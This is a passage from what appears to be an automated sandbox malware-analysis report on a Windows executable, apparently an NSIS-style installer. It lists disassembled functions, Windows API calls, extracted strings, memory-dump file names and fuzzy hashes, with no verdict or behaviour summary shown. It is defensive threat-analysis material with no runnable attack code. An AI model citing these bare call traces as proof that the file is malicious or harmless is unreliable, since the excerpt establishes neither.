                                                                                                          • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                          • wsprintfA.USER32 ref: 00405DFB
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E45
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                          • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                          • API String ID: 222337774-899692902
                                                                                                          • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                          • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                          • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                          • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                          APIs
                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc
                                                                                                          • String ID: s<u
                                                                                                          • API String ID: 1780285237-779365171
                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                          • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                          • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                          • CharPrevW.USER32(0040A300,0040A300,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                          • *?|<>/":, xrefs: 0040633B
                                                                                                          • "C:\Users\user\Desktop\m0CZ8H4jfl.exe", xrefs: 0040632D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: "C:\Users\user\Desktop\m0CZ8H4jfl.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 589700163-1978327910
                                                                                                          • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                          • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                          • GetSysColor.USER32(?), ref: 004041E4
                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                          • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                          • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                          • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                          • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2531174081-0
                                                                                                          • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                          • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                          • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                          • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                          • GetMessagePos.USER32 ref: 00404AA1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                          • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                          • MulDiv.KERNEL32(00069B4F,?,00069B53), ref: 00402D4D
                                                                                                          • wsprintfW.USER32 ref: 00402D5D
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 00402D57
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                          • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                          • String ID: Calibri
                                                                                                          • API String ID: 3808545654-1409258342
                                                                                                          • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                          • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                          • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                          • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                          APIs
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                          • String ID:
                                                                                                          • API String ID: 4216380887-0
                                                                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                          APIs
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                            • Part of subcall function 00403258: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                            • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403091
                                                                                                            • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403138
                                                                                                            • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403161
                                                                                                            • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403174
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 2082585436-0
                                                                                                          • Opcode ID: a6b29bbfff6bedb85eff617e0f32f780eda951c653e88163e3cff6ef8cd4870b
                                                                                                          • Instruction ID: f11faf613eabf70f6da5efab5544ef3b1f343b4f82166007b8c29dabf9a1b1c4
                                                                                                          • Opcode Fuzzy Hash: a6b29bbfff6bedb85eff617e0f32f780eda951c653e88163e3cff6ef8cd4870b
                                                                                                          • Instruction Fuzzy Hash: D0217C72800118BFCF116FA5CE4889E7EB9EF09324F24423AF554762E0C6795D81DB68
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dll,?,?,?,00000021), ref: 00402583
                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dll,?,?,?,00000021), ref: 0040258E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp$C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dll
                                                                                                          • API String ID: 3109718747-3646675532
                                                                                                          • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                          • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                          • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                          • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeGlobal
                                                                                                          • String ID:
                                                                                                          • API String ID: 2979337801-0
                                                                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
